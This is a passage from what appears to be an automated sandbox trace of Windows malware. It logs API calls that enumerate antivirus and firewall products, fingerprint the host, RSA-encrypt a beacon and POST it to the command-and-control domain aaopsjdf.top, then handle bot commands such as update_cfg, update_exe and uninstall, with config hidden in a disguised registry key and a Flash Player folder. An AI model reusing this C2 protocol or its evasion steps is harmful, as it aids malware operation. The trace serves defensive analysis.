This=0x38bd2ac, lTimeout=-1, uCount=0x1, apObjects=0x298f14c, puReturned=0x298f144 | out: apObjects=0x298f14c*=0x38bd2e8, puReturned=0x298f144*=0x1) returned 0x0 [0314.687] IWbemClassObject:Get (in: This=0x38bd2e8, wszName="displayName", lFlags=0, pVal=0x298f150*(varType=0xcfc8, wReserved1=0x235, wReserved2=0x0, wReserved3=0x0, varVal1=0x298f180, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x298f150*(varType=0x8, wReserved1=0x235, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0314.687] wvnsprintfW (in: pszDest=0x238e9d0, cchDest=515, pszFmt="%s ", arglist=0x298f12c | out: pszDest="Windows Defender ") returned 17 [0314.687] IEnumWbemClassObject:Next (in: This=0x38bd2ac, lTimeout=-1, uCount=0x1, apObjects=0x298f14c, puReturned=0x298f144 | out: apObjects=0x298f14c*=0x38bd2e8, puReturned=0x298f144*=0x0) returned 0x1 [0314.687] IUnknown:Release (This=0x38bd07c) returned 0x0 [0314.687] WbemLocator:IUnknown:Release (This=0x38b0880) returned 0x0 [0314.687] CoUninitialize () [0314.688] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0314.688] CoCreateInstance (in: rclsid=0x814b0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0x813e0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x298f160 | out: ppv=0x298f160*=0x38b0880) returned 0x0 [0314.688] WbemLocator:IWbemLocator:ConnectServer (in: This=0x38b0880, strNetworkResource="ROOT\\SecurityCenter", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x298f17c | out: ppNamespace=0x298f17c*=0x38bd07c) returned 0x0 [0314.692] CoSetProxyBlanket (pProxy=0x38bd07c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0314.692] IWbemServices:ExecQuery (in: This=0x38bd07c, strQueryLanguage="WQL", strQuery="Select * from FirewallProduct", lFlags=48, pCtx=0x0, ppEnum=0x298f140 | out: ppEnum=0x298f140*=0x38bd50c) returned 0x0 [0314.694] IEnumWbemClassObject:Next (in: This=0x38bd50c, lTimeout=-1, uCount=0x1, apObjects=0x298f14c, puReturned=0x298f144 | out: apObjects=0x298f14c*=0x0, puReturned=0x298f144*=0x0) returned 0x1 [0314.695] IUnknown:Release (This=0x38bd07c) returned 0x0 [0314.696] WbemLocator:IUnknown:Release (This=0x38b0880) returned 0x0 [0314.696] CoUninitialize () [0314.696] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0314.697] CoCreateInstance (in: rclsid=0x814b0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0x813e0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x298f160 | out: ppv=0x298f160*=0x38b0880) returned 0x0 [0314.697] WbemLocator:IWbemLocator:ConnectServer (in: This=0x38b0880, strNetworkResource="ROOT\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x298f17c | out: ppNamespace=0x298f17c*=0x38bd07c) returned 0x0 [0314.700] CoSetProxyBlanket (pProxy=0x38bd07c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0314.700] IWbemServices:ExecQuery (in: This=0x38bd07c, strQueryLanguage="WQL", strQuery="Select * from FirewallProduct", lFlags=48, pCtx=0x0, ppEnum=0x298f140 | out: ppEnum=0x298f140*=0x38bd5d4) returned 0x0 [0314.703] IEnumWbemClassObject:Next (in: This=0x38bd5d4, lTimeout=-1, uCount=0x1, apObjects=0x298f14c, puReturned=0x298f144 | out: apObjects=0x298f14c*=0x0, puReturned=0x298f144*=0x0) returned 0x1 [0314.704] IUnknown:Release (This=0x38bd07c) returned 0x0 [0314.704] WbemLocator:IUnknown:Release (This=0x38b0880) returned 0x0 [0314.704] CoUninitialize () [0314.705] wvnsprintfA (in: pszDest=0x235d7a0, cchDest=21, pszFmt="%d", arglist=0x298f434 | out: pszDest="1515610604") returned 10 [0314.705] wvnsprintfA (in: pszDest=0x235d818, cchDest=21, pszFmt="%d", arglist=0x298f3e4 | out: pszDest="1") returned 1 [0314.705] wvnsprintfA (in: pszDest=0x235d840, cchDest=21, pszFmt="%d", arglist=0x298f3e4 | out: pszDest="7601") returned 4 [0314.705] wvnsprintfA (in: pszDest=0x235d868, cchDest=21, pszFmt="%d", arglist=0x298f3e4 | out: pszDest="64") returned 2 [0314.705] wvnsprintfA (in: pszDest=0x235d890, cchDest=21, pszFmt="%d", arglist=0x298f3e4 | out: pszDest="0") returned 1 [0314.705] wvnsprintfA (in: pszDest=0x235d8b8, cchDest=21, pszFmt="%d", arglist=0x298f3e4 | out: pszDest="1033") returned 4 [0314.705] wvnsprintfA (in: pszDest=0x235d8b8, cchDest=21, pszFmt="%d", arglist=0x298f3e4 | out: pszDest="1") returned 1 [0314.705] wvnsprintfA (in: pszDest=0x235d890, cchDest=21, pszFmt="%d", arglist=0x298f3e4 | out: pszDest="7601") returned 4 [0314.705] wvnsprintfA (in: pszDest=0x235d868, cchDest=21, pszFmt="%d", arglist=0x298f3e4 | out: pszDest="64") returned 2 [0314.705] wvnsprintfA (in: pszDest=0x235d840, cchDest=21, pszFmt="%d", arglist=0x298f3e4 | out: pszDest="0") returned 1 [0314.705] wvnsprintfA (in: pszDest=0x235d818, cchDest=21, pszFmt="%d", arglist=0x298f3e4 | out: pszDest="1033") returned 4 [0314.705] wvnsprintfA (in: pszDest=0x235d7c8, cchDest=21, pszFmt="%d", arglist=0x298f434 | out: pszDest="18001217") returned 8 [0314.705] wvnsprintfA (in: pszDest=0x235d7f0, cchDest=21, pszFmt="%d", arglist=0x298f434 | out: pszDest="0") returned 1 [0314.705] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x298f366, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x298f0c8, pcbStructInfo=0x298f0ac | out: pvStructInfo=0x298f0c8, pcbStructInfo=0x298f0ac) returned 1 [0314.705] CryptImportPublicKeyInfo (in: hCryptProv=0x3de630, dwCertEncodingType=0x1, pInfo=0x4ac460*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x4ac490*, PublicKey.cbData=0x10d, PublicKey.pbData=0x4ac498*, PublicKey.cUnusedBits=0x0), phKey=0x298f0b8 | out: phKey=0x298f0b8*=0x45b5d8) returned 1 [0314.705] LocalFree (hMem=0x4ac460) returned 0x0 [0314.705] wvnsprintfA (in: pszDest=0x235d7f0, cchDest=21, pszFmt="%d", arglist=0x298efcc | out: pszDest="1515610604") returned 10 [0314.705] wvnsprintfA (in: pszDest=0x235d818, cchDest=21, pszFmt="%d", arglist=0x298ef7c | out: pszDest="1") returned 1 [0314.705] wvnsprintfA (in: pszDest=0x235d840, cchDest=21, pszFmt="%d", arglist=0x298ef7c | out: pszDest="7601") returned 4 [0314.705] wvnsprintfA (in: pszDest=0x235d868, cchDest=21, pszFmt="%d", arglist=0x298ef7c | out: pszDest="64") returned 2 [0314.705] wvnsprintfA (in: pszDest=0x235d890, cchDest=21, pszFmt="%d", arglist=0x298ef7c | out: pszDest="0") returned 1 [0314.705] wvnsprintfA (in: pszDest=0x235d8b8, cchDest=21, pszFmt="%d", arglist=0x298ef7c | out: pszDest="1033") returned 4 [0314.705] wvnsprintfA (in: pszDest=0x235d8b8, cchDest=21, pszFmt="%d", arglist=0x298ef7c | out: pszDest="1") returned 1 [0314.705] wvnsprintfA (in: pszDest=0x235d890, cchDest=21, pszFmt="%d", arglist=0x298ef7c | out: pszDest="7601") returned 4 [0314.705] wvnsprintfA (in: pszDest=0x235d868, cchDest=21, pszFmt="%d", arglist=0x298ef7c | out: pszDest="64") returned 2 [0314.705] wvnsprintfA (in: pszDest=0x235d840, cchDest=21, pszFmt="%d", arglist=0x298ef7c | out: pszDest="0") returned 1 [0314.705] wvnsprintfA (in: pszDest=0x235d818, cchDest=21, pszFmt="%d", arglist=0x298ef7c | out: pszDest="1033") returned 4 [0314.705] wvnsprintfA (in: pszDest=0x235d7c8, cchDest=21, pszFmt="%d", arglist=0x298efcc | out: pszDest="18001217") returned 8 [0314.706] wvnsprintfA (in: pszDest=0x235d7a0, cchDest=21, pszFmt="%d", arglist=0x298efcc | out: pszDest="0") returned 1 [0314.706] CryptEncrypt (in: hKey=0x45b5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x298ef18*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x298ef18*=0x100) returned 1 [0314.706] CryptEncrypt (in: hKey=0x45b5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x235d090*, pdwDataLen=0x298ef2c*=0x20, dwBufLen=0x100 | out: pbData=0x235d090*, pdwDataLen=0x298ef2c*=0x100) returned 1 [0314.706] CryptDestroyKey (hKey=0x45b5d8) returned 1 [0314.706] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1qesyozananrivoxityof.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x298f028 | out: lpUrlComponents=0x298f028) returned 1 [0314.706] wvnsprintfA (in: pszDest=0x238edd0, cchDest=516, pszFmt="%s%s", arglist=0x298f060 | out: pszDest="https://aaopsjdf.top/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw") returned 56 [0314.706] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x298f020 | out: lpUrlComponents=0x298f020) returned 1 [0314.706] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc000c [0314.706] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0314.706] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0314.706] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0314.706] InternetConnectA (hInternet=0xcc000c, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0314.706] HttpOpenRequestA (hConnect=0xcc0018, lpszVerb="POST", lpszObjectName="/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc0024 [0314.706] HttpSendRequestA (hRequest=0xcc0024, lpszHeaders="Connection: close\r\n\x90Ä", dwHeadersLength=0x13, lpOptional=0x238f510, dwOptionalLength=0x42c) returned 0 [0317.299] InternetQueryOptionA (in: hInternet=0xcc0024, dwOption=0x1f, lpBuffer=0x298ef44, lpdwBufferLength=0x298ef48 | out: lpBuffer=0x298ef44, lpdwBufferLength=0x298ef48) returned 1 [0317.299] InternetSetOptionA (hInternet=0xcc0024, dwOption=0x1f, lpBuffer=0x298ef44, dwBufferLength=0x4) returned 1 [0317.299] HttpSendRequestA (in: hRequest=0xcc0024, lpszHeaders="Connection: close\r\n\x90Ä", dwHeadersLength=0x13, lpOptional=0x238f510*, dwOptionalLength=0x42c | out: lpOptional=0x238f510*) returned 1 [0317.731] HttpQueryInfoA (in: hRequest=0xcc0024, dwInfoLevel=0x20000013, lpBuffer=0x298ef44, lpdwBufferLength=0x298ef48, lpdwIndex=0x0 | out: lpBuffer=0x298ef44*, lpdwBufferLength=0x298ef48*=0x4, lpdwIndex=0x0) returned 1 [0317.731] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.731] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x2398888, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f058 | out: lpBuffer=0x2398888*, lpdwNumberOfBytesRead=0x298f058*=0xec) returned 1 [0317.733] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.733] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x2398974, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x298f058 | out: lpBuffer=0x2398974*, lpdwNumberOfBytesRead=0x298f058*=0x0) returned 1 [0317.735] InternetCloseHandle (hInternet=0xcc0024) returned 1 [0317.738] InternetQueryOptionA (in: hInternet=0xcc0018, dwOption=0x15, lpBuffer=0x298f054, lpdwBufferLength=0x298f050 | out: lpBuffer=0x298f054, lpdwBufferLength=0x298f050) returned 1 [0317.738] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0317.738] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0317.738] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7e963, lpParameter=0x235d8e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3cc [0317.743] WaitForMultipleObjects (nCount=0x2, lpHandles=0x298f84c*=0x8, bWaitAll=0, dwMilliseconds=0x927c0) returned 0x0 [0328.085] CloseHandle (hObject=0x108) returned 1 Thread: id = 214 os_tid = 0x7d0 [0312.963] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0xffffffff) returned 0x0 [0328.087] WaitForSingleObject (hHandle=0xe4, dwMilliseconds=0x0) returned 0x102 [0328.087] WaitForSingleObject (hHandle=0xe8, dwMilliseconds=0x0) returned 0x0 [0328.087] CloseHandle (hObject=0xe8) returned 1 [0328.087] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0x0) returned 0x0 [0328.087] CloseHandle (hObject=0xec) returned 1 [0328.087] WaitForSingleObject (hHandle=0xf0, dwMilliseconds=0x0) returned 0x0 [0328.087] CloseHandle (hObject=0xf0) returned 1 [0328.087] WaitForSingleObject (hHandle=0xf4, dwMilliseconds=0x0) returned 0x102 [0328.087] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0x0) returned 0x0 [0328.087] CloseHandle (hObject=0xf8) returned 1 [0328.087] WaitForSingleObject (hHandle=0x3cc, dwMilliseconds=0x0) returned 0x0 [0328.088] CloseHandle (hObject=0x3cc) returned 1 [0328.088] WaitForMultipleObjects (nCount=0x2, lpHandles=0x876cc*=0xe4, bWaitAll=1, dwMilliseconds=0x4e20) returned 0x0 [0331.360] RtlRemoveVectoredExceptionHandler () returned 0x1 [0331.360] CryptReleaseContext (hProv=0x3de630, dwFlags=0x0) returned 1 [0331.360] CloseHandle (hObject=0x8) returned 1 [0331.360] ExitProcess (uExitCode=0x0) Thread: id = 224 os_tid = 0x68c Thread: id = 225 os_tid = 0x6bc Thread: id = 226 os_tid = 0x650 Thread: id = 227 os_tid = 0x6e0 Thread: id = 228 os_tid = 0x478 Thread: id = 247 os_tid = 0x684 Thread: id = 248 os_tid = 0x464 Thread: id = 249 os_tid = 0x46c Thread: id = 250 os_tid = 0x708 Thread: id = 296 os_tid = 0x704 Thread: id = 297 os_tid = 0x770 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="A3") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="54") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="99") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="2B") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="05") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="F4") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="DA") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="0E") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="B1") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="B4") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="AB") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="78") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="8E") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="3C") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="E9") returned 2 [0317.768] wvnsprintfW (in: pszDest=0x8df9d8, cchDest=3, pszFmt="%02X", arglist=0x8df9b4 | out: pszDest="88") returned 2 [0317.768] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="A354992B05F4DA0EB1B4AB788E3CE988") returned 0x5d0 [0317.768] WaitForSingleObject (hHandle=0x5d0, dwMilliseconds=0xffffffff) returned 0x0 [0317.768] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x235d1a8, cbMultiByte=57, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0317.768] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x235d1a8, cbMultiByte=57, lpWideCharStr=0x238edd0, cchWideChar=58 | out: lpWideCharStr="update_cfg https://aaopsjdf.top/1qesyozananrivoxityof.dat") returned 57 [0317.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e8a0, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0317.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e8a0, cbMultiByte=8, lpWideCharStr=0x2350d08, cchWideChar=9 | out: lpWideCharStr="shutdown") returned 8 [0317.769] lstrcmpiW (lpString1="update_cfg", lpString2="shutdown") returned 1 [0317.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e840, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0317.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e840, cbMultiByte=6, lpWideCharStr=0x2350d48, cchWideChar=7 | out: lpWideCharStr="reboot") returned 6 [0317.769] lstrcmpiW (lpString1="update_cfg", lpString2="reboot") returned 1 [0317.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e828, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0317.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e828, cbMultiByte=9, lpWideCharStr=0x2350d88, cchWideChar=10 | out: lpWideCharStr="uninstall") returned 9 [0317.769] lstrcmpiW (lpString1="update_cfg", lpString2="uninstall") returned 1 [0317.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e810, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0317.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e810, cbMultiByte=10, lpWideCharStr=0x235c4c0, cchWideChar=11 | out: lpWideCharStr="update_exe") returned 10 [0317.769] lstrcmpiW (lpString1="update_cfg", lpString2="update_exe") returned -1 [0317.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e750, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0317.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x238e750, cbMultiByte=10, lpWideCharStr=0x235c600, cchWideChar=11 | out: lpWideCharStr="update_cfg") returned 10 [0317.769] lstrcmpiW (lpString1="update_cfg", lpString2="update_cfg") returned 0 [0317.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="https://aaopsjdf.top/1qesyozananrivoxityof.dat", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0317.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="https://aaopsjdf.top/1qesyozananrivoxityof.dat", cchWideChar=46, lpMultiByteStr=0x23cfdb8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="https://aaopsjdf.top/1qesyozananrivoxityof.dat", lpUsedDefaultChar=0x0) returned 46 [0317.770] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x8de984 | out: phkResult=0x8de984*=0x5b0) returned 0x0 [0317.770] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x8de9b0, lpData=0x0, lpcbData=0x8de998*=0x0 | out: lpType=0x8de9b0*=0x3, lpData=0x0, lpcbData=0x8de998*=0x6f0) returned 0x0 [0317.770] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x8de9b0, lpData=0x238ef40, lpcbData=0x8de998*=0x6f0 | out: lpType=0x8de9b0*=0x3, lpData=0x238ef40*, lpcbData=0x8de998*=0x6f0) returned 0x0 [0317.770] RegCloseKey (hKey=0x5b0) returned 0x0 [0317.770] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1qesyozananrivoxityof.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x8df318 | out: lpUrlComponents=0x8df318) returned 1 [0317.770] GetSystemTime (in: lpSystemTime=0x8defc8 | out: lpSystemTime=0x8defc8*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x38, wSecond=0x30, wMilliseconds=0x275)) [0317.770] SystemTimeToFileTime (in: lpSystemTime=0x8defc8, lpFileTime=0x8defd8 | out: lpFileTime=0x8defd8) returned 1 [0317.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0317.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x238e5e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0317.771] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x8df050, nSize=0x8deffc | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x8deffc) returned 0x1 [0317.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0317.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x238ea48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YKYD69Q\\aETAdzjz", lpUsedDefaultChar=0x0) returned 16 [0317.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0317.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0x235d130, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DA064951B33C749DEEA4F9B0A440E075", lpUsedDefaultChar=0x0) returned 32 [0317.771] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x8def4c | out: phkResult=0x8def4c*=0x380) returned 0x0 [0317.771] RegQueryValueExW (in: hKey=0x380, lpValueName="Omegovna", lpReserved=0x0, lpType=0x8def78, lpData=0x0, lpcbData=0x8def60*=0x0 | out: lpType=0x8def78*=0x0, lpData=0x0, lpcbData=0x8def60*=0x0) returned 0x2 [0317.772] RegCloseKey (hKey=0x380) returned 0x0 [0317.772] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0317.772] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x8def50 | out: lpFileSize=0x8def50*=1776) returned 1 [0317.772] VirtualAlloc (lpAddress=0x0, dwSize=0x6f0, flAllocationType=0x3000, flProtect=0x4) returned 0x240000 [0317.772] ReadFile (in: hFile=0x380, lpBuffer=0x240000, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x8def60, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x8def60*=0x6f0, lpOverlapped=0x0) returned 1 [0317.773] VirtualFree (lpAddress=0x240000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.773] CloseHandle (hObject=0x380) returned 1 [0317.776] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x235d270, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0317.776] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x235d270, cbMultiByte=5, lpWideCharStr=0x235d318, cchWideChar=6 | out: lpWideCharStr="2.6.1") returned 5 [0317.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0317.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x235d270, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2.6.1", lpUsedDefaultChar=0x0) returned 5 [0317.776] wvnsprintfW (in: 